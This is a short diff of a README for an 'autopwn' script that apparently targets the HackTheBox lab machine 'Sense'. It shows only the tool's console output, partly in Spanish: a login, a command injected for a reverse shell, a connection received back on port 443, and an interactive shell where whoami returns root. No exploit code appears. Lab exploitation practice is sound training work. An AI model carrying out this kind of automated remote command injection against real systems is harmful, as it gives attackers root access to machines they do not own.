k4miyo/Sense-Autopwn/README.md

 [+] Conexión: Se ha recibido una conexión
 [+] Login: Ingresando exitosamente
 [+] Trying to bind to :: on port 443: Done
-[+] Waiting for connections on :::443: Got connection from ::ffff:10.10.10.60 on port 5833
+[+] Waiting for connections on :::443: Got connection from ::ffff:10.10.10.60 on port 18415
-[∧] RCE: Inyectando comando para reverse shell

-[*] Ha ocurrido un error...
+[+] RCE: Comando inyectado exitosamente
 [*] Switching to interactive mode
 $ whoami
 root
+$
 ```